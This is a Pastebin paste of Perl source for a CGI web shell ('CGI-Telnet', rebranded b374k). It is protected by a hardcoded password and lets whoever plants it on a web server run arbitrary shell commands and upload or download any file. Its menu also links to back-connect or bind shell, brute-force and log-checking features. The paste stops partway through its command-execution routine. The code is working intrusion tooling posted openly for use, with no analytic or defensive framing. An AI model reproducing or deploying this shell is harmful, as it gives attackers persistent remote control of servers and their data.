0xspade

CGI Telnet

Oct 24th, 2016
643
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 48.62 KB | None | 0 0
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. use MIME::Base64;
  3. $Version= "CGI-Telnet Version 1.3";
  4. $EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>b374k - CGI-Telnet</font>";
  5.  
  6. $Password = "spade";            # Change this. You will need to enter this
  7.                 # to login.
  8. sub Is_Win(){
  9.     $os = &trim($ENV{"SERVER_SOFTWARE"});
  10.     if($os =~ m/win/i){
  11.         return 1;
  12.     }
  13.     else{
  14.         return 0;
  15.     }
  16. }
  17. $WinNT = &Is_Win();             # You need to change the value of this to 1 if
  18.                                 # you're running this script on a Windows NT
  19.                                 # machine. If you're running it on Unix, you
  20.                                 # can leave the value as it is.
  21.  
  22. $NTCmdSep = "&";                # This character is used to seperate 2 commands
  23.                                 # in a command line on Windows NT.
  24.  
  25. $UnixCmdSep = ";";              # This character is used to seperate 2 commands
  26.                                 # in a command line on Unix.
  27.  
  28. $CommandTimeoutDuration = 10000;    # Time in seconds after commands will be killed
  29.                                 # Don't set this to a very large value. This is
  30.                                 # useful for commands that may hang or that
  31.                                 # take very long to execute, like "find /".
  32.                                 # This is valid only on Unix servers. It is
  33.                                 # ignored on NT Servers.
  34.  
  35. $ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
  36.                                 # browser as soon as it is output, otherwise
  37.                                 # it is buffered and send when the command
  38.                                 # completes. This is useful for commands like
  39.                                 # ping, so that you can see the output as it
  40.                                 # is being generated.
  41.  
  42. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  43.  
  44. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  45. $CmdPwd = ($WinNT ? "cd" : "pwd");
  46. $PathSep = ($WinNT ? "\\" : "/");
  47. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  48. $cols= 150;
  49. $rows= 26;
  50. #------------------------------------------------------------------------------
  51. # Reads the input sent by the browser and parses the input variables. It
  52. # parses GET, POST and multipart/form-data that is used for uploading files.
  53. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
  54. # Other variables can be accessed using $in{'var'}, where var is the name of
  55. # the variable. Note: Most of the code in this function is taken from other CGI
  56. # scripts.
  57. #------------------------------------------------------------------------------
  58. sub ReadParse
  59. {
  60.     local (*in) = @_ if @_;
  61.     local ($i, $loc, $key, $val);
  62.    
  63.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  64.  
  65.     if($ENV{'REQUEST_METHOD'} eq "GET")
  66.     {
  67.         $in = $ENV{'QUERY_STRING'};
  68.     }
  69.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  70.     {
  71.         binmode(STDIN) if $MultipartFormData & $WinNT;
  72.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  73.     }
  74.  
  75.     # handle file upload data
  76.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  77.     {
  78.         $Boundary = '--'.$1; # please refer to RFC1867
  79.         @list = split(/$Boundary/, $in);
  80.         $HeaderBody = $list[1];
  81.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  82.         $Header = $`;
  83.         $Body = $';
  84.         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  85.         $in{'filedata'} = $Body;
  86.         $Header =~ /filename=\"(.+)\"/;
  87.         $in{'f'} = $1;
  88.         $in{'f'} =~ s/\"//g;
  89.         $in{'f'} =~ s/\s//g;
  90.  
  91.         # parse trailer
  92.         for($i=2; $list[$i]; $i++)
  93.         {
  94.             $list[$i] =~ s/^.+name=$//;
  95.             $list[$i] =~ /\"(\w+)\"/;
  96.             $key = $1;
  97.             $val = $';
  98.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  99.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  100.             $in{$key} = $val;
  101.         }
  102.     }
  103.     else # standard post data (url encoded, not multipart)
  104.     {
  105.         @in = split(/&/, $in);
  106.         foreach $i (0 .. $#in)
  107.         {
  108.             $in[$i] =~ s/\+/ /g;
  109.             ($key, $val) = split(/=/, $in[$i], 2);
  110.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  111.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  112.             $in{$key} .= "\0" if (defined($in{$key}));
  113.             $in{$key} .= $val;
  114.         }
  115.     }
  116. }
  117.  
  118. #------------------------------------------------------------------------------
  119. # Prints the HTML Page Header
  120. # Argument 1: Form item name to which focus should be set
  121. #------------------------------------------------------------------------------
  122. sub PrintPageHeader
  123. {
  124.     $EncodedCurrentDir = $CurrentDir;
  125.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  126.     my $dir =$CurrentDir;
  127.     $dir=~ s/\\/\\\\/g;
  128.     print "Content-type: text/html\n\n";
  129.     print <<END;
  130. <html>
  131. <head>
  132. <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  133. <title>Hacsugia</title>
  134.  
  135. $HtmlMetaHeader
  136.  
  137. </head>
  138. <style>
  139. body{
  140. font: 10pt Verdana;
  141. }
  142. tr {
  143. BORDER-RIGHT:  #3e3e3e 1px solid;
  144. BORDER-TOP:    #3e3e3e 1px solid;
  145. BORDER-LEFT:   #3e3e3e 1px solid;
  146. BORDER-BOTTOM: #3e3e3e 1px solid;
  147. color: #ff9900;
  148. }
  149. td {
  150. BORDER-RIGHT:  #3e3e3e 1px solid;
  151. BORDER-TOP:    #3e3e3e 1px solid;
  152. BORDER-LEFT:   #3e3e3e 1px solid;
  153. BORDER-BOTTOM: #3e3e3e 1px solid;
  154. color: #2BA8EC;
  155. font: 10pt Verdana;
  156. }
  157.  
  158. table {
  159. BORDER-RIGHT:  #3e3e3e 1px solid;
  160. BORDER-TOP:    #3e3e3e 1px solid;
  161. BORDER-LEFT:   #3e3e3e 1px solid;
  162. BORDER-BOTTOM: #3e3e3e 1px solid;
  163. BACKGROUND-COLOR: #111;
  164. }
  165.  
  166.  
  167. input {
  168. BORDER-RIGHT:  #3e3e3e 1px solid;
  169. BORDER-TOP:    #3e3e3e 1px solid;
  170. BORDER-LEFT:   #3e3e3e 1px solid;
  171. BORDER-BOTTOM: #3e3e3e 1px solid;
  172. BACKGROUND-COLOR: Black;
  173. font: 10pt Verdana;
  174. color: #ff9900;
  175. }
  176.  
  177. input.submit {
  178. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  179. color: #FFFFFF;
  180. border-color: #009900;
  181. }
  182.  
  183. code {
  184. border          : dashed 0px #333;
  185. BACKGROUND-COLOR: Black;
  186. font: 10pt Verdana bold;
  187. color: while;
  188. }
  189.  
  190. run {
  191. border          : dashed 0px #333;
  192. font: 10pt Verdana bold;
  193. color: #FF00AA;
  194. }
  195.  
  196. textarea {
  197. BORDER-RIGHT:  #3e3e3e 1px solid;
  198. BORDER-TOP:    #3e3e3e 1px solid;
  199. BORDER-LEFT:   #3e3e3e 1px solid;
  200. BORDER-BOTTOM: #3e3e3e 1px solid;
  201. BACKGROUND-COLOR: #1b1b1b;
  202. font: Fixedsys bold;
  203. color: #aaa;
  204. }
  205. A:link {
  206.     COLOR: #2BA8EC; TEXT-DECORATION: none
  207. }
  208. A:visited {
  209.     COLOR: #2BA8EC; TEXT-DECORATION: none
  210. }
  211. A:hover {
  212.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  213.     color: #ff9900; TEXT-DECORATION: none
  214. }
  215. A:active {
  216.     color: Red; TEXT-DECORATION: none
  217. }
  218.  
  219. .listdir tr:hover{
  220.     background: #444;
  221. }
  222. .listdir tr:hover td{
  223.     background: #444;
  224.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  225.     color: #FFFFFF; TEXT-DECORATION: none;
  226. }
  227. .notline{
  228.     background: #111;
  229. }
  230. .line{
  231.     background: #222;
  232. }
  233. </style>
  234. <script language="javascript">
  235. function chmod_form(i,file)
  236. {
  237.     /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
  238.     var ajax="";
  239.     document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  240.     document.getElementById("text_" + i).focus();
  241. }
  242. function rm_chmod_form(response,i,perms,file)
  243. {
  244.     response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
  245. }
  246. function rename_form(i,file,f)
  247. {
  248.     var ajax="";
  249.     f.replace(/\\\\/g,"\\\\\\\\");
  250.     var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
  251.     document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  252.     document.getElementById("text_" + i).focus();
  253. }
  254. function rm_rename_form(i,file,f)
  255. {
  256.     if(f=='f')
  257.     {
  258.         document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
  259.     }else
  260.     {
  261.         document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
  262.     }
  263. }
  264. </script>
  265. <body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  266. <center><code>
  267. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  268. <tr>
  269.     <td align="center" rowspan=2>
  270.         <b><font size="5">$EditPersion</font></b>
  271.     </td>
  272.  
  273.     <td>
  274.  
  275.         <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
  276.     </td>
  277.     <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
  278.     </td>
  279.  
  280. </tr>
  281.  
  282. <tr>
  283. <td colspan="3"><font face="Verdana" size="2">
  284. <a href="$ScriptLocation">Home</a> |
  285. <a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Command</a> |
  286. <a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">GUI</a> |
  287. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  288. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  289.  
  290. <a href="$ScriptLocation?a=backbind">Back & Bind</a> |
  291. <a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
  292. <a href="$ScriptLocation?a=checklog">Check Log</a> |
  293. <a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
  294. <a href="$ScriptLocation?a=logout">Logout</a> |
  295. <a target='_blank' href="#">Help</a>
  296.  
  297. </font></td>
  298. </tr>
  299. </table>
  300. <font id="ResponseData" color="#ff99cc" >
  301. END
  302. }
  303.  
  304. #------------------------------------------------------------------------------
  305. # Prints the Login Screen
  306. #------------------------------------------------------------------------------
  307. sub PrintLoginScreen
  308. {
  309.  
  310.     print <<END;
  311. <pre><script type="text/javascript">
  312. TypingText = function(element, interval, cursor, finishedCallback) {
  313.   if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  314.     this.running = true;    // Never run.
  315.     return;
  316.   }
  317.   this.element = element;
  318.   this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  319.   this.interval = (typeof interval == "undefined" ? 100 : interval);
  320.   this.origText = this.element.innerHTML;
  321.   this.unparsedOrigText = this.origText;
  322.   this.cursor = (cursor ? cursor : "");
  323.   this.currentText = "";
  324.   this.currentChar = 0;
  325.   this.element.typingText = this;
  326.   if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  327.   TypingText.all.push(this);
  328.   this.running = false;
  329.   this.inTag = false;
  330.   this.tagBuffer = "";
  331.   this.inHTMLEntity = false;
  332.   this.HTMLEntityBuffer = "";
  333. }
  334. TypingText.all = new Array();
  335. TypingText.currentIndex = 0;
  336. TypingText.runAll = function() {
  337.   for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  338. }
  339. TypingText.prototype.run = function() {
  340.   if(this.running) return;
  341.   if(typeof this.origText == "undefined") {
  342.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);   // We haven't finished loading yet.  Have patience.
  343.     return;
  344.   }
  345.   if(this.currentText == "") this.element.innerHTML = "";
  346. //  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  347.   if(this.currentChar < this.origText.length) {
  348.     if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  349.       this.tagBuffer = "<";
  350.       this.inTag = true;
  351.       this.currentChar++;
  352.       this.run();
  353.       return;
  354.     } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  355.       this.tagBuffer += ">";
  356.       this.inTag = false;
  357.       this.currentText += this.tagBuffer;
  358.       this.currentChar++;
  359.       this.run();
  360.       return;
  361.     } else if(this.inTag) {
  362.       this.tagBuffer += this.origText.charAt(this.currentChar);
  363.       this.currentChar++;
  364.       this.run();
  365.       return;
  366.     } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  367.       this.HTMLEntityBuffer = "&";
  368.       this.inHTMLEntity = true;
  369.       this.currentChar++;
  370.       this.run();
  371.       return;
  372.     } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  373.       this.HTMLEntityBuffer += ";";
  374.       this.inHTMLEntity = false;
  375.       this.currentText += this.HTMLEntityBuffer;
  376.       this.currentChar++;
  377.       this.run();
  378.       return;
  379.     } else if(this.inHTMLEntity) {
  380.       this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  381.       this.currentChar++;
  382.       this.run();
  383.       return;
  384.     } else {
  385.       this.currentText += this.origText.charAt(this.currentChar);
  386.     }
  387.     this.element.innerHTML = this.currentText;
  388.     this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  389.     this.currentChar++;
  390.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  391.   } else {
  392.     this.currentText = "";
  393.     this.currentChar = 0;
  394.         this.running = false;
  395.         this.finishedCallback();
  396.   }
  397. }
  398. </script>
  399. </pre>
  400.  
  401. <font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 Rohitab Batra </font><br><br>
  402. <table align="center" border="1" width="600" heigh>
  403. <tbody><tr>
  404. <td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
  405. <font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
  406.  
  407. <font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
  408. <font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
  409. <font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
  410.  
  411. <font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
  412.  
  413. <font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
  414. <font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
  415. </tr>
  416. </tbody></table>
  417. <br>
  418.  
  419. <script type="text/javascript">
  420. new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  421. TypingText.runAll();
  422.  
  423. </script>
  424. END
  425. }
  426.  
  427. #------------------------------------------------------------------------------
  428. # Add html special chars
  429. #------------------------------------------------------------------------------
  430. sub HtmlSpecialChars($){
  431.     my $text = shift;
  432.     $text =~ s/&/&amp;/g;
  433.     $text =~ s/"/&quot;/g;
  434.     $text =~ s/'/&#039;/g;
  435.     $text =~ s/</&lt;/g;
  436.     $text =~ s/>/&gt;/g;
  437.     return $text;
  438. }
  439. #------------------------------------------------------------------------------
  440. # Add link for directory
  441. #------------------------------------------------------------------------------
  442. sub AddLinkDir($)
  443. {
  444.     my $ac=shift;
  445.     my @dir=();
  446.     if($WinNT)
  447.     {
  448.         @dir=split(/\\/,$CurrentDir);
  449.     }else
  450.     {
  451.         @dir=split("/",&trim($CurrentDir));
  452.     }
  453.     my $path="";
  454.     my $result="";
  455.     foreach (@dir)
  456.     {
  457.         $path .= $_.$PathSep;
  458.         $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
  459.     }
  460.     return $result;
  461. }
  462. #------------------------------------------------------------------------------
  463. # Prints the message that informs the user of a failed login
  464. #------------------------------------------------------------------------------
  465. sub PrintLoginFailedMessage
  466. {
  467.     print <<END;
  468. <br>Login : Administrator<br>
  469.  
  470. Password:<br>
  471. Login incorrect<br><br>
  472. END
  473. }
  474.  
  475. #------------------------------------------------------------------------------
  476. # Prints the HTML form for logging in
  477. #------------------------------------------------------------------------------
  478. sub PrintLoginForm
  479. {
  480.     print <<END;
  481. <form name="f" method="POST" action="$ScriptLocation">
  482. <input type="hidden" name="a" value="login">
  483. Login : Administrator<br>
  484. Password:<input type="password" name="p">
  485. <input class="submit" type="submit" value="Enter">
  486. </form>
  487. END
  488. }
  489.  
  490. #------------------------------------------------------------------------------
  491. # Prints the footer for the HTML Page
  492. #------------------------------------------------------------------------------
  493. sub PrintPageFooter
  494. {
  495.     print "<br><font color=red>o---[  <font color=#ff9900>Edit by $EditPersion </font>  ]---o</font></code></center></body></html>";
  496. }
  497.  
  498. #------------------------------------------------------------------------------
  499. # Retreives the values of all cookies. The cookies can be accesses using the
  500. # variable $Cookies{'}
  501. #------------------------------------------------------------------------------
  502. sub GetCookies
  503. {
  504.     @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  505.     foreach $cookie(@httpcookies)
  506.     {
  507.         ($id, $val) = split(/=/, $cookie);
  508.         $Cookies{$id} = $val;
  509.     }
  510. }
  511.  
  512. #------------------------------------------------------------------------------
  513. # Prints the screen when the user logs out
  514. #------------------------------------------------------------------------------
  515. sub PrintLogoutScreen
  516. {
  517.     print "Connection closed by foreign host.<br><br>";
  518. }
  519.  
  520. #------------------------------------------------------------------------------
  521. # Logs out the user and allows the user to login again
  522. #------------------------------------------------------------------------------
  523. sub PerformLogout
  524. {
  525.     print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  526.     &PrintPageHeader("p");
  527.     &PrintLogoutScreen;
  528.  
  529.     &PrintLoginScreen;
  530.     &PrintLoginForm;
  531.     &PrintPageFooter;
  532.     exit;
  533. }
  534.  
  535. #------------------------------------------------------------------------------
  536. # This function is called to login the user. If the password matches, it
  537. # displays a page that allows the user to run commands. If the password doens't
  538. # match or if no password is entered, it displays a form that allows the user
  539. # to login
  540. #------------------------------------------------------------------------------
  541. sub PerformLogin
  542. {
  543.     if($LoginPassword eq $Password) # password matched
  544.     {
  545.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  546.         &PrintPageHeader;
  547.         print &ListDir;
  548.     }
  549.     else # password didn't match
  550.     {
  551.         &PrintPageHeader("p");
  552.         &PrintLoginScreen;
  553.         if($LoginPassword ne "") # some password was entered
  554.         {
  555.             &PrintLoginFailedMessage;
  556.  
  557.         }
  558.         &PrintLoginForm;
  559.         &PrintPageFooter;
  560.         exit;
  561.     }
  562. }
  563.  
  564. #------------------------------------------------------------------------------
  565. # Prints the HTML form that allows the user to enter commands
  566. #------------------------------------------------------------------------------
  567. sub PrintCommandLineInputForm
  568. {
  569.     my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
  570.     $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
  571.     return <<END;
  572. <form name="f" method="POST" action="$ScriptLocation">
  573.  
  574. <input type="hidden" name="a" value="command">
  575.  
  576. <input type="hidden" name="d" value="$CurrentDir">
  577. $Prompt
  578. <input type="text" size="50" name="c">
  579. <input class="submit"type="submit" value="Enter">
  580. </form>
  581. END
  582. }
  583.  
  584. #------------------------------------------------------------------------------
  585. # Prints the HTML form that allows the user to download files
  586. #------------------------------------------------------------------------------
  587. sub PrintFileDownloadForm
  588. {
  589.     my $dir = &AddLinkDir("download");
  590.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  591.     return <<END;
  592. <form name="f" method="POST" action="$ScriptLocation">
  593. <input type="hidden" name="d" value="$CurrentDir">
  594. <input type="hidden" name="a" value="download">
  595. $Prompt download<br><br>
  596. Filename: <input class="file" type="text" name="f" size="35"><br><br>
  597. Download: <input class="submit" type="submit" value="Begin">
  598.  
  599. </form>
  600. END
  601. }
  602.  
  603. #------------------------------------------------------------------------------
  604. # Prints the HTML form that allows the user to upload files
  605. #------------------------------------------------------------------------------
  606. sub PrintFileUploadForm
  607. {
  608.     my $dir= &AddLinkDir("upload");
  609.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  610.     return <<END;
  611. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  612. $Prompt upload<br><br>
  613. Filename: <input class="file" type="file" name="f" size="35"><br><br>
  614. Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
  615. <label for="up">Overwrite if it Exists</label><br><br>
  616. Upload:&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
  617. <input type="hidden" name="d" value="$CurrentDir">
  618. <input class="submit" type="hidden" name="a" value="upload">
  619.  
  620. </form>
  621.  
  622. END
  623. }
  624.  
  625. #------------------------------------------------------------------------------
  626. # This function is called when the timeout for a command expires. We need to
  627. # terminate the script immediately. This function is valid only on Unix. It is
  628. # never called when the script is running on NT.
  629. #------------------------------------------------------------------------------
  630. sub CommandTimeout
  631. {
  632.     if(!$WinNT)
  633.     {
  634.         alarm(0);
  635.         return <<END;
  636. </textarea>
  637. <br><font color=yellow>
  638. Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
  639. <br><font size='6' color=red>Killed it!</font>
  640. END
  641.     }
  642. }
  643.  
  644.  
  645.  
  646. #------------------------------------------------------------------------------
  647. # This function displays the page that contains a link which allows the user
  648. # to download the specified file. The page also contains a auto-refresh
  649. # feature that starts the download automatically.
  650. # Argument 1: Fully qualified filename of the file to be downloaded
  651. #------------------------------------------------------------------------------
  652. sub PrintDownloadLinkPage
  653. {
  654.     local($FileUrl) = @_;
  655.     my $result="";
  656.     if(-e $FileUrl) # if the file exists
  657.     {
  658.         # encode the file link so we can send it to the browser
  659.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  660.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  661.         $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  662.         &PrintPageHeader("c");
  663.         $result .= <<END;
  664. Sending File $TransferFile...<br>
  665.  
  666. If the download does not start automatically,
  667. <a href="$DownloadLink">Click Here</a>
  668. END
  669.         $result .= &PrintCommandLineInputForm;
  670.     }
  671.     else # file doesn't exist
  672.     {
  673.         $result .= "Failed to download $FileUrl: $!";
  674.         $result .= &PrintFileDownloadForm;
  675.     }
  676.     return $result;
  677. }
  678.  
  679. #------------------------------------------------------------------------------
  680. # This function reads the specified file from the disk and sends it to the
  681. # browser, so that it can be downloaded by the user.
  682. # Argument 1: Fully qualified pathname of the file to be sent.
  683. #------------------------------------------------------------------------------
  684. sub SendFileToBrowser
  685. {
  686.     my $result = "";
  687.     local($SendFile) = @_;
  688.     if(open(SENDFILE, $SendFile)) # file opened for reading
  689.     {
  690.         if($WinNT)
  691.         {
  692.             binmode(SENDFILE);
  693.             binmode(STDOUT);
  694.         }
  695.         $FileSize = (stat($SendFile))[7];
  696.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  697.         print "Content-Type: application/x-unknown\n";
  698.         print "Content-Length: $FileSize\n";
  699.         print "Content-Disposition: attachment; filename=$1\n\n";
  700.         print while(<SENDFILE>);
  701.         close(SENDFILE);
  702.         exit(1);
  703.     }
  704.     else # failed to open file
  705.     {
  706.         $result .= "Failed to download $SendFile: $!";
  707.         $result .=&PrintFileDownloadForm;
  708.     }
  709.     return $result;
  710. }
  711.  
  712.  
  713. #------------------------------------------------------------------------------
  714. # This function is called when the user downloads a file. It displays a message
  715. # to the user and provides a link through which the file can be downloaded.
  716. # This function is also called when the user clicks on that link. In this case,
  717. # the file is read and sent to the browser.
  718. #------------------------------------------------------------------------------
  719. sub BeginDownload
  720. {
  721.     # get fully qualified path of the file to be downloaded
  722.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  723.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  724.     {
  725.         $TargetFile = $TransferFile;
  726.     }
  727.     else # path is relative
  728.     {
  729.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  730.         $TargetFile .= $PathSep.$TransferFile;
  731.     }
  732.  
  733.     if($Options eq "go") # we have to send the file
  734.     {
  735.         &SendFileToBrowser($TargetFile);
  736.     }
  737.     else # we have to send only the link page
  738.     {
  739.         &PrintDownloadLinkPage($TargetFile);
  740.     }
  741. }
  742.  
  743. #------------------------------------------------------------------------------
  744. # This function is called when the user wants to upload a file. If the
  745. # file is not specified, it displays a form allowing the user to specify a
  746. # file, otherwise it starts the upload process.
  747. #------------------------------------------------------------------------------
  748. sub UploadFile
  749. {
  750.     # if no file is specified, print the upload form again
  751.     if($TransferFile eq "")
  752.     {
  753.         return &PrintFileUploadForm;
  754.  
  755.     }
  756.     my $result="";
  757.     # start the uploading process
  758.     $result .= "Uploading $TransferFile to $CurrentDir...<br>";
  759.  
  760.     # get the fullly qualified pathname of the file to be created
  761.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  762.     $TransferFile =~ m!([^/^\\]*)$!;
  763.     $TargetName .= $PathSep.$1;
  764.  
  765.     $TargetFileSize = length($in{'filedata'});
  766.     # if the file exists and we are not supposed to overwrite it
  767.     if(-e $TargetName && $Options ne "overwrite")
  768.     {
  769.         $result .= "Failed: Destination file already exists.<br>";
  770.     }
  771.     else # file is not present
  772.     {
  773.         if(open(UPLOADFILE, ">$TargetName"))
  774.         {
  775.             binmode(UPLOADFILE) if $WinNT;
  776.             print UPLOADFILE $in{'filedata'};
  777.             close(UPLOADFILE);
  778.             $result .= "Transfered $TargetFileSize Bytes.<br>";
  779.             $result .= "File Path: $TargetName<br>";
  780.         }
  781.         else
  782.         {
  783.             $result .= "Failed: $!<br>";
  784.         }
  785.     }
  786.     $result .= &PrintCommandLineInputForm;
  787.     return $result;
  788. }
  789.  
  790. #------------------------------------------------------------------------------
  791. # This function is called when the user wants to download a file. If the
  792. # filename is not specified, it displays a form allowing the user to specify a
  793. # file, otherwise it displays a message to the user and provides a link
  794. # through  which the file can be downloaded.
  795. #------------------------------------------------------------------------------
  796. sub DownloadFile
  797. {
  798.     # if no file is specified, print the download form again
  799.     if($TransferFile eq "")
  800.     {
  801.         &PrintPageHeader("f");
  802.         return &PrintFileDownloadForm;
  803.     }
  804.    
  805.     # get fully qualified path of the file to be downloaded
  806.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  807.     {
  808.         $TargetFile = $TransferFile;
  809.     }
  810.     else # path is relative
  811.     {
  812.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  813.         $TargetFile .= $PathSep.$TransferFile;
  814.     }
  815.  
  816.     if($Options eq "go") # we have to send the file
  817.     {
  818.         return &SendFileToBrowser($TargetFile);
  819.     }
  820.     else # we have to send only the link page
  821.     {
  822.         return &PrintDownloadLinkPage($TargetFile);
  823.     }
  824. }
  825.  
  826.  
  827. #------------------------------------------------------------------------------
  828. # This function is called to execute commands. It displays the output of the
  829. # command and allows the user to enter another command. The change directory
  830. # command is handled differently. In this case, the new directory is stored in
  831. # an internal variable and is used each time a command has to be executed. The
  832. # output of the change directory command is not displayed to the users
  833. # therefore error messages cannot be displayed.
  834. #------------------------------------------------------------------------------
  835. sub ExecuteCommand
  836. {
  837.     my $result="";
  838.     if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  839.     {
  840.         # we change the directory internally. The output of the
  841.         # command is not displayed.
  842.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  843.         chop($CurrentDir = `$Command`);
  844.         $result .= &PrintCommandLineInputForm;
  845.  
  846.         $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
  847.         # xuat thong tin khi chuyen den 1 thu muc nao do!
  848.         $RunCommand= $WinNT?"dir":"dir -lia";
